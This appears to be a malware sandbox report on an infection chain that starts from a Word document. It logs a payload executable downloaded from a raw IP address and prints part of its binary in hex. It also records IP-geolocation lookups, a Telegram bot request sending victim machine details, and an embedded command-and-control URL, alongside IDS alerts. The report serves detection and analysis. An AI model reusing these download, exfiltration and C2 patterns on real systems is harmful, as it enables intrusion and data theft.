Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 87.120.84.38:80 -> 192.168.2.22:49163
Source: Network traffic	Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 87.120.84.38:80 -> 192.168.2.22:49163
Source: Network traffic	Suricata IDS: 2827449 - Severity 1 - ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123) : 87.120.84.38:80 -> 192.168.2.22:49163

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Wed, 30 Oct 2024 07:25:03 GMTContent-Type: application/x-msdos-programContent-Length: 755712Connection: keep-aliveLast-Modified: Wed, 30 Oct 2024 01:58:38 GMTETag: "b8800-625a80a540932"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 86 91 21 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6c 0b 00 00 1a 00 00 00 00 00 00 a2 8a 0b 00 00 20 00 00 00 a0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 8a 0b 00 4f 00 00 00 00 a0 0b 00 20 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 6a 0b 00 00 20 00 00 00 6c 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 17 00 00 00 a0 0b 00 00 18 00 00 00 6e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0b 00 00 02 00 00 00 86 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 8a 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 0c 71 00 00 c4 67 00 00 03 00 00 00 81 00 00 06 d0 d8 00 00 80 b1 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 12 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 28 17 00 00 0a 0a 2b 00 06 2a 00 00 13 30 02 00 13 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 28 18 00 00 0a 0a 2b 00 06 2a 00 13 30 03 00 14 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 28 19 00 00 0a 0a 2b 00 06 2a 13 30 04 00 15 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 28 1a 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 05 00 17 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 0e 04 28 1b 00 00 0a 0a 2b 00 06 2a 00 13 30 06 00 19 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 0e 04 0e 05 28 1c 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 02 00 19 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 28 1d 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 03 00 1a 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 28 1e 00 00 0a 0a 2b 00 06 2a 00 00 13 30 04 00 1b 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 05

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2010/31/2024%20/%204:16:24%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: SHARCOM-ASBG SHARCOM-ASBG

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49164 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49167 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49172 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49170 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49166 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET /txt/pKL9HXcZosWfPt1.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.38Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.84.38

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2B82D526-DA5E-48B6-9927-FFCE89E887B8}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2010/31/2024%20/%204:16:24%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /txt/pKL9HXcZosWfPt1.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.38Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 30 Oct 2024 07:25:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
